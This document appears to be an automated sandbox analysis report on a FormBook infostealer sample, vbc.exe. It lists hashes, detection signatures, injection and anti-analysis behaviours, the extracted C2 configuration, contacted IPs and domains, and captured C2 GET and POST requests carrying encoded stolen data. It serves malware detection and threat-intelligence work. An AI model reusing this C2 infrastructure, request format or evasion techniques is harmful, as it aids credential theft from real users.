Windows Analysis Report
vbc.exe

Overview

General Information

Sample Name: vbc.exe
Analysis ID: 680447
MD5: ba5fa6ee78fe62b57ce7947f6bdb86ff
SHA1: f8409167b9b3e09f390c28cbcebfbec670af16de
SHA256: c2073d015c278a0816ca4ae0a19892874782517dd5133a112ca1f57d44f754fb
Tags: exe
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Deletes itself after installation
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: vbc.exe ReversingLabs: Detection: 31%
Yara detected FormBook
Source: Yara match File source: 6.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.632823935.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.403522788.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.409203550.000000000397B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.463881212.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.484050905.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.631975004.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.631553136.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Machine Learning detection for sample
Source: vbc.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 6.0.vbc.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0000000D.00000002.632823935.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.reliabenefitssupport.com/etn4/"], "decoy": ["rV2+KhY2v4ETgrjhsOdtLg==", "eSFnVjRiqHAIadtGwrlpa74g6QcN", "WZH5aS87DxPqd6LDQIeq4JfVOck=", "YXnbVkLXpUHo30zy", "ESabcsMz4lz1XQ==", "mL0iinqiZDYNlkQ=", "jkmgFdnw4lz1XQ==", "G7v+3ZquDaYqgMM44ViNN86tgw==", "fENjGOD2ZVQDed3Mwx8=", "iCtlTip4Pd1nyU7+qostG4sg6QcN", "qcQk+tw6bXxKYg7Bt6U1", "7Z374sbf2YQ20GDBt6U1", "P/5LupTXJv+9QA==", "okeclmSxOBqVypK3Qbw/N86tgw==", "5qsId0poQS3V/igYoQ==", "c4Ho3qfDIR7N3N3Mwx8=", "6IPSTh4/Dd9+AxAt9JBvIgw=", "87ESB8bRIASQ21AHs4srEJUueZ4bcCA=", "ed5PMq5cJ7wf", "KOdLpJv3iTfGC/Yh8JBvIgw=", "IjuokGaEheWX0kXw", "54lp0LAGDcjT+sLlsOdtLg==", "hUCHBtHr4lz1XQ==", "Smr7HOz3z9Lo30zy", "SlvEQBVnZhEXRcUipw==", "8ZRlzaD4vtLo30zy", "hzUJ6+ZA0Ni5593Mwx8=", "CBpvZ0VrqnIimUD78pBvIgw=", "gevEKiV7emwbk4167ErNe3RucHmhf5gZ", "+7WJXFqv+stZyH4ts6O2ZpfVOck=", "xWhDroGpqZFTohQ1qw==", "DiNuwbgR1pInnYrsWfModZfVOck=", "VCNwUfqPHCj2gCKUOdCLDwY=", "Zbyd6qqyqv3+qibRwh0=", "hQ8A9Mn1PV8/ahDBt6U1", "bRsE/+D2dYA3px6Nm5Ar", "13fAoonmbJt7x/YhlQWeZF+xNMM=", "OUNALhAnXym6C27oYZBvIgw=", "/JFzZjNNy8FufbxiR5y7bpfVOck=", "Ezt/7MDk88rfAbyyXDf6ri6D", "OveJTrEkjffzEUw=", "P+nKsn6TDRbhcyzWXkjZxIdyP94=", "qj0kA9PnPj0HLGYL3o2LCzSF", "xoHVLjFOiHpklb9iXNEA822rlA==", "Me5FrmyQQ1ktS4j+pQH9c5fVOck=", "fhrqUiZJWjVO3QD3", "uWEoEq8LmA==", "ki96WDIo+QLw6vAPddk9", "SILf07XfI+B53VrBt6U1", "zI/68LrZeDDuEE4=", "Ude5qpW19dSOFsx3/uZ/gN7X1gFcHg==", "K+FAq4KZIOLiaxTKvA/6ri6D", "8AVbxnGVmZ90l2BBFGMi", "321HQPJDy7V8oVBK8uPhGoog6QcN", "tG83oX2Ynbmj6VvBt6U1", "9Y55bFqvNyboed3Mwx8=", "O88UfEGPq1PPJaZS9hSYZBs=", "XyL3blOj7cF7nt6NDu3mrvcOI6YF", "u0+YhnzTEtKgw1H4", "vSmevGTLljuzSg==", "K+w3E/dcJ7wf", "X2+vnIixBeq6593Mwx8=", "aPPTtXp9zMh68pQD/AinOQ==", "p1Y3rXrJMTUeWaFaQ74HQ5Qg6QcN"]}
Uses 32bit PE files
Source: vbc.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: vbc.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: wntdll.pdbUGP source: vbc.exe, 00000006.00000003.406454999.00000000013F4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.404197199.000000000125D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.497959345.0000000004ADC000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.644322679.0000000004F2F000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.500502722.0000000004C79000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.642912671.0000000004E10000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000006.00000003.406454999.00000000013F4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.404197199.000000000125D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.497959345.0000000004ADC000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.644322679.0000000004F2F000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.500502722.0000000004C79000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.642912671.0000000004E10000.00000040.00000800.00020000.00000000.sdmp

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 192.185.131.238 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 108.167.169.56 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 103.141.97.24 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.funwave.info
Source: C:\Windows\explorer.exe Domain query: www.tadeumilhosrp.com
Source: C:\Windows\explorer.exe Domain query: www.reprograme-se10x.com
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.reliabenefitssupport.com/etn4/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: VECTANTARTERIANetworksCorporationJP VECTANTARTERIANetworksCorporationJP
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /etn4/?jDK=cFN0wh5pOr2lLXB&cRvt5xTh=Cta36k8ikZqurnipoxkRmmGd40Kya2aSborXxyuf+Fe+qece1yHxQlddjwwspvxEwVKtNXVfvaYDvAKdsC9znF0tof1OuukDyDlLohNqUsvE HTTP/1.1Host: www.funwave.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /etn4/?cRvt5xTh=molCG9tOWGG77xzFdRevdPvUiNWpIWpi7GNNNgA2ifx3ZRGhVtKNJJVLj+R0F9QcWvNkIdZbD/ktNYP0MkMUr0Msa5tKdHW+1cW/UCZDWxnM&jDK=cFN0wh5pOr2lLXB HTTP/1.1Host: www.reprograme-se10x.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /etn4/?jDK=cFN0wh5pOr2lLXB&cRvt5xTh=/R5Ku0REc5kTBOTK4FybjCic+J3HjscPDRicZMYanJDb3VFeXunUS1CfOY6dWIQDflcWbkgY3XkW9HfCwqM4rRtZZd8ZPm0cmGZ9eLaMCkCJ HTTP/1.1Host: www.tadeumilhosrp.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 192.185.131.238 192.185.131.238
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /etn4/ HTTP/1.1Host: www.reprograme-se10x.comConnection: closeContent-Length: 418Cache-Control: no-cacheOrigin: http://www.reprograme-se10x.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.reprograme-se10x.com/etn4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 52 76 74 35 78 54 68 3d 72 71 4e 69 46 4a 6b 64 61 44 65 48 31 48 6e 36 5a 44 61 75 49 38 72 58 79 4f 7e 46 63 6e 67 49 68 47 68 55 57 54 73 39 6a 38 74 57 4a 52 6d 45 45 5a 57 79 49 70 74 79 73 50 51 71 59 38 41 63 53 75 51 33 44 5f 78 5f 54 73 78 39 49 34 57 6e 62 58 67 45 71 57 77 67 4a 35 74 6c 65 55 6e 39 78 71 75 30 58 67 30 35 58 48 61 6a 4e 4f 63 49 6e 4e 64 58 59 6e 79 35 39 36 6a 41 66 30 55 33 77 4a 54 73 59 4d 35 4f 76 67 48 6a 52 68 32 48 49 68 73 30 78 32 50 56 71 38 62 50 31 57 76 66 52 47 36 41 4a 39 44 5f 38 57 6d 75 53 75 5a 49 75 5f 7a 63 36 78 38 79 74 69 46 79 56 6b 28 5a 63 34 39 78 6d 50 54 4a 6e 6b 6d 52 70 4f 35 68 78 5f 56 64 67 77 4b 78 6c 5a 32 71 6a 70 57 76 63 4e 4c 61 37 48 50 51 4c 6b 36 30 45 30 6c 36 47 62 55 43 41 2d 59 6a 72 31 44 47 76 39 58 32 49 66 67 6f 43 66 44 70 57 51 44 45 4c 77 37 42 6a 72 59 68 30 46 6b 67 46 57 53 4c 32 38 73 73 70 34 4f 37 5a 52 48 36 31 47 39 63 71 7a 61 76 30 4f 6a 44 31 48 35 65 46 57 52 41 33 38 46 61 53 6f 73 79 6e 5f 6d 51 74 61 54 2d 64 6e 59 7a 63 65 69 53 70 7a 65 42 73 35 4b 48 57 52 59 37 49 32 6f 76 49 47 58 47 62 70 39 31 34 73 5a 43 7e 46 38 34 51 47 62 66 44 42 52 39 7e 62 68 4a 44 4c 47 59 56 49 39 59 6f 50 56 43 56 72 72 52 52 75 52 41 64 55 6f 2e 00 00 00 00 00 00 00 00 Data Ascii: cRvt5xTh=rqNiFJkdaDeH1Hn6ZDauI8rXyO~FcngIhGhUWTs9j8tWJRmEEZWyIptysPQqY8AcSuQ3D_x_Tsx9I4WnbXgEqWwgJ5tleUn9xqu0Xg05XHajNOcInNdXYny596jAf0U3wJTsYM5OvgHjRh2HIhs0x2PVq8bP1WvfRG6AJ9D_8WmuSuZIu_zc6x8ytiFyVk(Zc49xmPTJnkmRpO5hx_VdgwKxlZ2qjpWvcNLa7HPQLk60E0l6GbUCA-Yjr1DGv9X2IfgoCfDpWQDELw7BjrYh0FkgFWSL28ssp4O7ZRH61G9cqzav0OjD1H5eFWRA38FaSosyn_mQtaT-dnYzceiSpzeBs5KHWRY7I2ovIGXGbp914sZC~F84QGbfDBR9~bhJDLGYVI9YoPVCVrrRRuRAdUo.
Source: global traffic HTTP traffic detected: POST /etn4/ HTTP/1.1Host: www.tadeumilhosrp.comConnection: closeContent-Length: 418Cache-Control: no-cacheOrigin: http://www.tadeumilhosrp.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.tadeumilhosrp.com/etn4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 52 76 74 35 78 54 68 3d 79 54 52 71 74 42 46 70 58 5f 6b 4e 44 76 44 76 77 58 43 2d 77 7a 57 53 6b 71 71 37 68 4f 4e 62 51 51 69 61 46 4b 49 56 74 37 6d 63 34 6d 51 70 4f 5f 54 63 5a 48 43 51 48 6f 4c 49 62 2d 56 6f 57 67 6c 49 54 56 6f 68 7a 6c 64 6c 37 6c 36 46 28 36 51 4c 6e 69 55 74 4b 64 49 39 50 55 34 67 6e 6e 70 35 63 34 6e 59 44 51 7a 63 45 43 32 76 5a 45 6e 4a 67 74 6f 70 42 41 35 49 51 5f 28 31 35 48 77 7a 48 72 64 47 48 6b 4a 34 32 54 63 5a 4f 37 76 67 6c 6e 70 63 42 74 70 63 72 66 4b 5f 56 69 36 48 4c 68 49 78 35 5f 69 44 74 51 46 34 51 6f 6b 33 41 65 75 5f 36 6a 49 66 6e 36 54 69 75 53 39 46 66 4a 4d 6a 78 6f 42 6c 63 59 76 65 43 75 74 66 7a 4f 69 4e 73 41 68 6f 47 7a 42 33 49 6f 44 47 30 54 37 48 6b 45 58 33 4e 32 58 32 66 48 7a 68 4d 64 49 69 37 67 39 54 6c 63 28 38 79 69 65 35 77 65 67 50 64 62 42 37 72 55 68 61 61 30 28 5a 6e 35 49 6c 53 39 6c 69 67 6d 69 59 6f 70 78 69 65 5a 42 32 61 77 50 73 38 53 6a 53 76 62 61 73 5a 52 63 55 4f 51 37 4b 36 55 6c 5a 78 43 76 6d 6f 42 4d 71 61 4d 44 4d 49 58 62 6f 56 39 61 72 52 7a 36 37 33 53 33 4c 38 2d 6b 57 43 32 5a 66 6a 30 77 73 4a 68 46 76 4f 74 47 39 28 53 4f 47 33 68 56 79 6c 37 74 4f 4d 32 35 62 6a 4d 74 50 32 38 28 77 54 69 63 42 76 74 30 57 30 39 35 6e 47 71 67 2e 00 00 00 00 00 00 00 00 Data Ascii: cRvt5xTh=yTRqtBFpX_kNDvDvwXC-wzWSkqq7hONbQQiaFKIVt7mc4mQpO_TcZHCQHoLIb-VoWglITVohzldl7l6F(6QLniUtKdI9PU4gnnp5c4nYDQzcEC2vZEnJgtopBA5IQ_(15HwzHrdGHkJ42TcZO7vglnpcBtpcrfK_Vi6HLhIx5_iDtQF4Qok3Aeu_6jIfn6TiuS9FfJMjxoBlcYveCutfzOiNsAhoGzB3IoDG0T7HkEX3N2X2fHzhMdIi7g9Tlc(8yie5wegPdbB7rUhaa0(Zn5IlS9ligmiYopxieZB2awPs8SjSvbasZRcUOQ7K6UlZxCvmoBMqaMDMIXboV9arRz673S3L8-kWC2Zfj0wsJhFvOtG9(SOG3hVyl7tOM25bjMtP28(wTicBvt0W095nGqg.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 08 Aug 2022 14:11:20 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://reprograme-se10x.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 14456Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed b2 eb 92 e3 c6 b1 35 fa db fd 14 35 54 48 43 da 2c 10 e0 b5 1b 6c b6 2d c9 b2 3e 47 58 de 0e 8d bc bf 38 61 3b 26 8a 40 02 a8 e9 42 15 5c 55 e0 65 e8 3e 7f f7 73 7c 71 7e 9c 77 38 7f fd 62 27 0b e0 ad bb c1 be cd 8c e4 bd ad e9 21 59 95 95 b9 72 e5 ca 75 f9 ea b7 ff f1 f5 0f ff d7 9f be 21 99 cd c5 d5 d9 a5 fb 21 82 c9 74 d6 2a 2c fd d3 0f 2d 17 03 16 5f 9d fd e2 32 07 cb 48 94 31 6d c0 ce 5a 7f fe e1 77 f4 bc 45 7a fb 17 c9 72 98 b5 16 1c 96 85 d2 b6 45 22 25 2d 48 cc 5c f2 d8 66 b3 18 16 3c 02 5a 5d ba 84 4b 6e 39 13 d4 44 4c c0 2c a8 70 8e 60 5e 6b 35 57 d6 bc de 83 bc ce d9 8a f2 9c a5 40 0b 0d ae 49 28 98 4e e1 75 55 68 b9 15 70 f5 a7 7f fe 9f 94 4b 44 f8 e7 ff a3 08 48 57 aa 59 cc c8 17 9f 9d f7 83 60 4a be 87 42 ab 54 23 3e 35 40 80 fc e7 37 7f fc e7 7f 7d e9 5d f6 ea f2 b3 4b c1 e5 35 d1 20 66 af 63 69 5c 9f 04 6c 94 bd 26 19 9e 66 af 7b 3d 7d 0c 10 f8 2b 2f 52 79 4d e0 b1 4a e3 2d 3d a5 d3 3b c9 2d 26 2c 68 c9 2c b4 88 5d 17 a8 1e 2b 0a c1 23 66 b9 92 3d 6d cc af 56 b9 c0 27 47 6f d6 3a 41 9f 7c a1 d9 df 4b 35 25 bf 03 88 5b 75 c7 56 66 6d 61 c2 66 c6 bd 04 13 7b ad 4f 4d 85 c4 80 db cb 71 79 ff fc 3f 9a 2b f3 24 6a f8 71 15 e6 98 a3 89 34 2f ec d5 d9 92 cb 58 2d bd b7 cb 02 72 f5 8e bf 01 6b b9 4c 0d 99 91 4d 6b ce 0c fc 59 8b 56 b8 85 ff 6b ef af 3b cd ff da ab 6c 63 fe 8a e0 1a fe da ab 8a ff da 0b 86 9e ef f9 7f ed 4d fa ab 49 ff af bd 56 b7 05 2b 8b f5 5e 21 53 bc 98 45 fa 32 3c 2c ac d0 f0 f7 9b 1a 10 4f ee ae 4a 1d 41 2b dc b4 d0 97 28 6b 55 b6 c5 af e0 9b f4 f8 6b 6f 59 50 2e 23 51 c6 ae e1 3b 53 05 aa 52 8a 5b 03 9c da cb b9 f4 de 99 5f 2f 40 cf c6 48 21 68 dd dc 4c cf 7a bf 7c 45 7e c8 b8 21 09 17 40 f0 97 95 56 d1 14 24 68 6c 1d 93 5f f6 ce 5e 25 a5 8c dc 76 db d0 65 5d db d9 2c 98 26 b2 ab bb aa cb 67 cc 8b 34 60 e6 37 02 dc 3e da ad 88 c9 05 33 ad 4e b7 98 71 2f 05 fb b5 92 16 05 fb e2 8b e3 5b bb d5 8f 5b 9d e9 0e 98 18 84 de 02 b3 d9 1b ab 71 5d 5e a2 55 fe 75 c6 f4 d7 2a 86 2e cc da 85 17 e1 1c fa 7b 88 6c db ef fa 5d ee 2d 79 6c 33 fc cd 80 a7 99 c5 8e 1e 0e 21 7e 70 f8 cc 73 ae 5c b7 2d 8e d6 85 0e a6 fb 1d cc b4 ea b7 cc b2 3f 7f ff 87 76 a7 33 d5 60 4b 2d c9 cb 71 ed 16 17 66 b3 d9 2d ec 9b fd 60 51 1b ea b1 ec 7d a5 6a bb a2 0c d6 33 3a 9a a1 02 5e 0c 09 6e c7 7a 76 5d c0 ac e5 94 ea bd 63 28 67 9d d9 65 4e c2 6d bd f9 6a fd 03 4b ff 88 2e 68 b7 32 60 28 e7 5f fc bf 39 76 20 e3 af 33 2e e2 b6 45 1e 4a b7 d5 ec 4b ad d9 ba dd 4a 04 73 fe aa fd d4 c1 6e a6 2c 0a a5 ad 99 6d 00 4d b1 c6 99 64 1a be f2 bb 87 db 37 ab 08 0a fb 3b 2c c4 f8 4d 57 cf fc a9 be 54 9e 00 99 da 6c aa 7f f5 ab ce
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Mon, 08 Aug 2022 14:11:27 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "616e0979-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Mon, 08 Aug 2022 14:11:30 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "616e0979-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
